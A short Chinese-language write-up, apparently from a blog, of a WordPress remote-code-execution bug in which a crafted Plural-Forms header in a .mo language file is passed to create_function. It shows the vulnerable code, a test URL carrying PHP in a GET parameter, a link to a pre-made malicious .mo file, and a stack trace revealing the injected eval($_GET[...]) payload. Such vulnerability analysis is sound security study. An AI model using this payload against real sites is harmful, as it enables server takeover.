1.原因:
create_function的誤用
這裏可以看到棧調用信息
http://127.0.0.1/wordpress/?c=$e=new%20Exception;%20var_dump($e-%3EgetTraceAsString());;function make_plural_form_function($nplurals, $expression) {
$expression = str_replace('n', '$n', $expression);
$func_body = "
\$index = (int)($expression);
return (\$index < $nplurals)? \$index : $nplurals - 1;";
return create_function('$n', $func_body);
}
修改header頭,通過修改語言包mo文件(工具 PoEdit),閉合對應的語句,然後達到代碼執行的目的,也可以下載大神修改好的mo自己測試 https://gist.github.com/anonymous/908a087b95035d9fc9ca46cef4984e97
string(1334) "#0 C:\xampp\htdocs\wordpress\wp-includes\pomo\translations.php(171) : runtime-created function(2): eval() #1 C:\xampp\htdocs\wordpress\wp-includes\pomo\translations.php(171): create_function('$n', '\n\t\t\t$index = (i...') #2 C:\xampp\htdocs\wordpress\wp-includes\pomo\translations.php(224): Gettext_Translations->make_plural_form_function(1, 'n);}eval($_GET[...') #3 C:\xampp\htdocs\wordpress\wp-includes\pomo\translations.php(62): Gettext_Translations->set_header('Plural-Forms', 'nplurals=1; plu...') #4 C:\xampp\htdocs\wordpress\wp-includes\pomo\mo.php(210): Translations->set_headers(Array) #5 C:\xampp\htdocs\wordpress\wp-includes\pomo\mo.php(27): MO->import_from_reader(Object(POMO_FileReader)) #6 C:\xampp\htdocs\wordpress\wp-includes\l10n.php(342): MO->import_from_file('C:\\xampp\\htdocs...') #7 C:\xampp\htdocs\wordpress\wp-includes\l10n.php(388): load_textdomain('default', 'C:\\xampp\\htdocs...') #8 C:\xampp\htdocs\wordpress\wp-settings.php(268): load_default_textdomain() #9 C:\xampp\htdocs\wordpress\wp-config.php(87): require_once('C:\\xampp\\htdocs...') #10 C:\xampp\htdocs\wordpress\wp-load.php(29): require_once('C:\\xampp\\htdocs...') #11 C:\xampp\htdocs\wordpress\wp-blog-header.php(12): require_once('C:\\xampp\\htdocs...') #12 C:\xampp\htdocs\wordpress\index.php(18): require('C:\\xampp\\htdocs...') #13 {main}"
效果圖
